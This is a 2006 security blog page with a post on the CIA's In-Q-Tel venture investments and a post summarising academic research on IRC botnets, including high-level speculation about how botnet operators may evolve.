Dancho Danchev's Blog - Mind Streams of Information Security Knowledge: 10/16/06

Monday, October 16, 2006

CIA's In-Q-Tel Investments Portfolio

In a previous post "Aha, a Backdoor!" I discussed the "exemption" of publicly traded companies from reporting to the SEC the usual way, and particularly their investments related to national security. The strategy is visionary enough to act a major incentive factor for companies to both, innovate, and supply the homeland security and defense markets.

However, publicly obtainable data can still reveal historical developments:

"A relatively unknown branch of the CIA is investing millions of taxpayer dollars in technology startups that, together, paint a map for the future of spying. Some of these technologies can pry into the personal lives of Americans not just for the government but for big businesses as well.

The CIA's venture capitalist arm, In-Q-Tel, has invested at least $185 million in startups since 1999, molding these companies' products into technologies the intelligence community can use.

More than 60 percent of In-Q-Tel’s current investments are in companies that specialize in automatically collecting, sifting through and understanding oceans of information, according to an analysis by the Medill School of Journalism. While In-Q-Tel has successfully helped push data analysis technology ahead, implementing it within the government for national security remains a challenge, and one of In-Q-Tel’s former CEOs, Gilman Louie, has concerns about whether privacy and civil liberties will be protected."

In a related Red Herring article, In-Q-Tel points out that :

“We don’t just invest in equity of companies,” said Scott Yancey, the firm’s interim chief executive. “That’s kind of the hallmark of who we are in terms of being the strategic investor.”

Observers said the payments don’t fit with the typical venture model.

“To the extent that In-Q-Tel incentivizes its portfolio companies or employees otherwise, it sounds like from an outsider’s point of view that they’ve needed to create some artificial incentives that wouldn’t otherwise be necessary in a traditional venture model,” said Scott Joachim, a partner with the law firm Drinker, Biddle, & Reath."

The Intelligence Community realizes that innovation will come from outsiders working for insiders, and with "more than 130 technology solutions to the intelligence community", CIA's In-Q-Tel seems to have made quite some sound investments.

A true angel investor in the "silent war". And yes, even you can submit a business plan looking for seed capital -- and a "tail" to ensure you're developing in the right direction?

Dancho Danchev

Independent Security Consultancy, Threat Intelligence Analysis (OSINT/Cyber Counter Intelligence) and Competitive Intelligence research on demand. Insightful, unbiased, and client-tailored assessments, neatly communicated in the form of interactive reports - because anticipating the emerging threatscape is what shapes the big picture at the end of the day. Approach me at dancho.danchev@hush.com

Observing and Analyzing Botnets

Informative and rich on visual materials, research presenting a "A Multifaceted Approach to Understanding the Botnet Phenomenon"

"Throughout a period of more than three months, we used this infrastructure to track 192 unique IRC botnets of size ranging from a few hundred to several thousand infected end-hosts. Our results show that botnets represent a major contributor to unwanted Internet traffic—27% of all malicious connection attempts observed from our distributed darknet can be directly attributed to botnetrelated spreading activity. Furthermore, we discovered evidence of botnet infections in 11% of the 800,000 DNS domains we examined, indicating a high diversity among botnet victims. Taken as a whole, these results not only highlight the prominence of botnets, but also provide deep insights that may facilitate further research to curtail this phenomenon."

Botnets' security implications are often taken as a phenomenon, whereas this is not the case as distributed computing concepts have been around for decades. Some interesting graphs and observations in this research are :

- Breakdown of scan-related commands seen on tracked botnets during the measurement period
- The percentage of bots that launched the respective services (AV/FW Killer) on the victim machines
- Distribution of exploited hosts extracted from the IRC tracker logs

What botnet masters will definitely optimise :
- disinformation for number and geolocation of infected hosts
- alternative and covert communication channels compared to stripped, or encrypted IRC sessions
- rethink of concept of performance vs stealthiness
- rethinking how to retain the infected nodes, compared to putting more efforts into infecting new ones
- for true competitiveness, vulnerabilities in anti-virus solutions allowing the code to remain undetected for as long as possible
- synchronization with results from popular test beds such as VirusTotal for immediate reintroduction of an undetected payload

The future of malware stands for solid ecosystem and diversity, whereas, both, researchers, the Pentagon, and malware authors are actively benchmarking and optimising malware, each having seperate objectives to achieve.

Go through a previous post "Malware Bot Families, Technology and Trends" in case you want to find out more about botnet technologies, and update yourself with the most recent case of DDoS extortion.

Dancho Danchev